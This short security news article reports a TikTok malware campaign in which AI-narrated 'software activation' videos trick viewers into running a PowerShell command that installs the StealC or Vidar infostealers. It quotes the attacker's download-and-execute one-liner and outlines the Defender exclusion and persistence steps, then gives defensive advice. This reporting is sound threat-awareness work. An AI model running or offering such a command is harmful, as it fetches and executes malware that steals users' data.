Forget Email Viruses—Now Hackers Infect Devices Through TikTok Videos
Cybercriminals are increasingly using TikTok—not to follow trends, but to spread malware. A new campaign uncovered by Trend Micro leverages the platform to deliver StealC and Vidar backdoors. The videos appear as harmless tutorials—teaching users how to "activate" software like Windows or Spotify—but they’re voiced by AI-generated narrators and show no real person on screen.
How the Attack Works
Unlike traditional malware campaigns, there are no suspicious links or commands in the video descriptions. Instead, victims manually type a PowerShell command after seeing it displayed in the video. One such clip amassed over 500,000 views, highlighting the scale of the threat.
The Malicious Chain:
- The user follows the "tutorial," pressing Win + R and pasting a command like:
powershell
iwr hxxps://allaivo.me/spotify -UseBasicParsing | iex
- The script:
- Creates hidden directories in %APPDATA% and %LOCALAPPDATA%.
- Adds them to Windows Defender exclusions.
- Downloads and executes Vidar or StealC from a remote server.
- The malware persists via registry autostart and connects to C2 servers, some disguised as legitimate platforms like Steam and Telegram for stealth.
Why This is Dangerous
- No Exploits Needed: The attack relies entirely on social engineering, bypassing traditional security checks.
- Hard to Detect: Malicious traffic blends in with normal Steam/Telegram connections.
- Viral Spread: TikTok’s algorithm amplifies malicious content rapidly.
Who’s Behind It?
Accounts like @gitallowed and @zane.houghton (now banned) were linked to the campaign. But new ones can emerge anytime—any user uploading similar videos becomes a potential infection vector.How to Defend Against It
✔ Monitor OSINT trends—track emerging threats in social media.✔ Use behavioral analytics—flag unusual PowerShell activity.
✔ Train employees—teach them to recognize visual phishing.
✔ Deploy anomaly detection—look for IOCs beyond standard malware signatures.
